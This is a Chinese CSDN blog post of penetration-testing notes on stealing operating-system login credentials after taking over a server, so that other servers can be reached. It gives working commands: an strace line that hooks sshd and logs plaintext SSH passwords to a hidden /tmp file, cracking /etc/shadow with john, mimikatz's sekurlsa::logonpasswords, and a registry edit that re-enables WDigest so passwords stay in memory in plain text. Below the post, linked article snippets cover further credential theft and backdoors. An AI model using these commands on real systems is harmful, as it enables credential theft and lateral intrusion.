操作系统登录凭证获取

最新推荐文章于 2024-04-09 13:01:14 发布
最新推荐文章于 2024-04-09 13:01:14 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43835473/article/details/109107803
版权

最近看了一些关于获取操作系统登录凭证的文章,当我们通过渗透获取到一台服务器权限之后,为了扩大战果,我们可以总是会想办法通过收集各种密码凭证,曾经就遇到过有客户所有服务器都是统一的账号密码,被拿到一台服务器的账号密码后,其他服务器也都被轻松拿下。因此在此记录一些密码凭证的获取方法。

一、Linux登录凭证

测试环境:CentOS7

1.strace收集
strace是一个动态跟踪工具,堪比键盘记录器
(1)抓取进程sshd中的明文密码输入 /tmp/.sshd.log

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

(2)然后用正则来匹配用户密码,输出的日志为二进制文件,需要加-a参数

grep -aE 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

(3)然后就可以在输出结果中看到账号密码
在这里插入图片描述2.shadow文件破解
shadow文件用于存储 Linux 系统中用户的密码信息,密码域由三部分组成,即 $id $salt $encrypted,id=1表明是用MD5加密的、id=2是用Blowfish加密的、id=5是用 SHA-256加密的,id=6时,采用SHA512进行加密。我这测试环境为CentOS7,id=6,为SHA512加密,可以用john解密
在这里插入图片描述破解出testtest账号密码为123456,john可以破解一些简单的弱口令,我这还有root账号的密码较强,并未解密成功
在这里插入图片描述二、window登录凭证

测试环境:Windows server 2012 R2

1.mimiktaz

mimiktaz可以抓取在内存中的密码,使用方法很简单,两条命令
(1)首先获取调试权限 privilege::debug
在这里插入图片描述(2)读取密码,sekurlsa::logonpasswords
在这里插入图片描述(3)将NTLM中的密文进行解密
在这里插入图片描述
我这里没有抓取到administrator的明文密码,看别人文章后发现微软在win7之后就打了补丁kb2871997,通过禁用Wdigest Auth来强制系统内存不保存明文密码,需要修改注册表让Wdigest Auth保存明文密码
在powshell中输入命令:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

在这里插入图片描述

修改后需重启或注销用户才生效,然后重新用mimiktaz抓取
在这里插入图片描述成功

split_personality
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows 用户登录凭证管理
08-07
Window 10 用户凭证 管理,用户凭证保存位置,如何更改密码?更改登录域?
凭证管理系统(凭证管理系统)
02-04
凭证管理系统 Left = 12 Top = 47 Width = 422 Height = 120 DataSource = DataSource1 ImeName = #20013#25991' ('#31616#20307') - '#20840#25340 Options = [dgTitles, dgIndicator, dgColumnResize, dgColLines, dgRowLines, dgTabs, dgRowSelect, dgConfirmDelete, dgCancelOnExit] ReadOnly = True TabOrder = 1 TitleFont.Charset = DEFAULT_CHARSET TitleFont.Color = clBlue TitleFont.Height = -11 TitleFont.Name = 'MS Sans Serif' TitleFont.Style = []
WCE Windows hash抓取工具 教程
Polemo的博客
03-09 7082
WCE 下载地址:链接:https://share.weiyun.com/5MqXW47 密码:bdpqku 工具界面
凭证获取:Linux凭证获取
qq_68163788的博客
02-15 1196
在Linux系统中,凭证获取是指获取和管理用户身份验证信息的过程。凭证通常包括用户名和密码,用于验证用户的身份并授予特定的权限。 在Linux系统中,有几种常见的凭证获取方式。最常见的是通过输入用户名和密码进行身份验证。用户可以通过登录界面或命令行提示输入凭证来验证其身份。另一种方式是使用SSH密钥对进行远程身份验证。用户可以生成公钥和私钥,将公钥放置在远程服务器上,然后使用私钥进行身份验证。
Linux获取登录凭证总结
weixin_44747030的博客
02-20 5885
Linux下获取凭证总结 前言 文章仅做学习交流 在内网渗透中,有时往往只需要一个凭证,撕开一个口子,慢慢的就能打通整个内网,下面会介绍在内网中碰到linux机器如何获取凭证的方法。 history记录 linux的history命令的作用是,记录执行过的命令。 这里可以看到当前在使用的shell是zsh,而在每个用户下都会生成一个文件.shell名_history的文件(如.zsh_history),在关闭终端后才会输入到该文件。 输入history查看执行过的命令 而在这里面可以分析到管理员会在这台
完整版系统登录模块.rar
04-03
系统会检查输入的凭证是否匹配数据库中存储的信息。为了安全起见,密码通常以哈希形式存储,而不是明文。哈希算法如MD5、SHA-1或更安全的SHA-256等,可以将密码转化为不可逆的固定长度字符串。 2. **验证码技术**:...
PHP-syetem.rar_用户系统_登录 php
09-22
登录过程涉及身份验证,确保输入的凭证与数据库中存储的匹配。 3. 用户信息管理:用户可以查看、更新或删除自己的个人信息,如修改密码、绑定邮箱、设置头像等。 4. 权限控制:根据用户的角色或等级,系统分配不同...
获取当前系统用户登录密码
11-17
在IT领域,安全性和隐私...总之,获取Windows用户的登录密码涉及到深入理解操作系统安全机制,调用底层API,以及遵循严格的权限和隐私政策。在实际应用中,更推荐使用标准的身份验证流程,以确保系统的安全性和合规性。
用WMI获取操作系统补丁信息
06-29
本文将深入探讨如何利用C++通过WMI获取操作系统的补丁(hotfix)信息,同时介绍虚拟接口技术在MFC DLL中的应用。 首先,WMI是微软提出的一种基于WBEM(Web-Based Enterprise Management)标准的组件,它为管理系统...
jsp.zip_jsp 课程设计_登录系统jsp
09-24
5. **数据库连接**:登录系统需要验证用户输入的凭证,这通常涉及到数据库操作。学生需要了解如何使用JDBC(Java Database Connectivity)来连接数据库,执行SQL查询,并处理查询结果。 6. **会话管理**:登录成功...
Windows下登录凭证窃取技巧
10-09 4万+
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的技巧和工具。 1、Windows 本地密码Hash Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。 例如: Admin...
查看Windows凭据和普通凭据的密码(查看Windows中存储的密码)——mimikatz
热门推荐
一碗单炒饭的专栏
02-10 6万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4335
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1840
获取一台域内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问域控或横向拓展,那么在获取本地用户、域用户凭证获取域控Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
登录凭证------_登录凭证是什么(1),网络安全开发基础学习
最新发布
2401_84139192的博客
04-09 816
在这个过程中,确保数据传输的安全性是非常重要的。通常,用户名和密码的传输会使用HTTPS等加密协议进行保护,以防止信息泄露。同时,对于登录凭证的存储和使用,也需要采取适当的安全措施,以防止被恶意利用。请注意,具体的实现方式会根据你使用的技术栈和框架有所不同。例如,如果你使用的是Spring Security等安全框架,它通常会提供一套完整的用户认证和授权机制,包括登录凭证的生成和管理。在实际开发中,建议参考你所使用的技术栈和框架的官方文档或相关教程,以获取更具体和详细的指导。
登录凭证------
kjl536566的博客
03-10 645
为什么需要登录凭证?web开发中,我们使用的协议http是无状态协议,http每次请求都是一个单独的请求,和之前的请求没有关系,服务器就不知道上一步你做了什么操作,我们需要一个办法证明我没登录过。
【渗透笔记】Windows密码凭证获取
白菜猪肉炖粉条
12-03 2747
Windows Hash Windows系统使用两种方法对用户的密码进行哈希处理,它们分别是**LAN Manager(LM)哈希和NT LAN Manager(NTLM)**哈希。 LM哈希存在缺陷,所以新版的win不再使用 LM哈希密码最大长度为14,密码长度超过14位使用NTLM哈 希 所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行 一次数学加密函数运算,然后返回一个固定长度的字符串。 现在已经有了更新的NTLMv2以及Kerberos验证体系
Mimiktaz抓取本机密码
weixin_30376323的博客
05-20 144
Mimiktaz2.0以后的版本只需要两条命令即可实现密码的抓取 mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords 转载于:https://www.cnblogs.com/zlgxzswjy/p/6881942.html...
mimikatz的基本使用
a3320315的博客
05-25 9809
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
微信小程序维护登录态与获取用户信息
05-23
微信小程序中,可以通过使用微信提供的登录功能获取用户的OpenID和SessionKey。具体流程如下: 1. 用户进入小程序并点击登录按钮。 2. 小程序调用 `wx.login()` 方法获取用户的临时登录凭证 code。 3. 小程序将 code 发送到开发者服务器。 4. 开发者服务器使用 code 调用微信提供的接口 `https://api.weixin.qq.com/sns/jscode2session` 获取用户的 OpenID 和 SessionKey。 5. 开发者服务器将获取到的 OpenID 和 SessionKey 返回给小程序。 6. 小程序将用户的 OpenID 和 SessionKey 存储到本地,用于后续的登录和用户信息获取获取用户信息的流程如下: 1. 用户点击授权按钮授权小程序获取用户信息。 2. 小程序调用 `wx.getUserInfo()` 方法获取用户信息。 3. 小程序将用户信息发送到开发者服务器。 4. 开发者服务器将用户信息存储到数据库中。 5. 小程序使用存储在本地的 OpenID 和 SessionKey 发送请求到开发者服务器,获取用户信息。 需要注意的是,小程序中的登录态和用户信息只在当前小程序中有效,不同的小程序之间是无法共享的。如果用户需要在多个小程序中使用同一个账号,需要在每个小程序中单独进行登录和授权操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值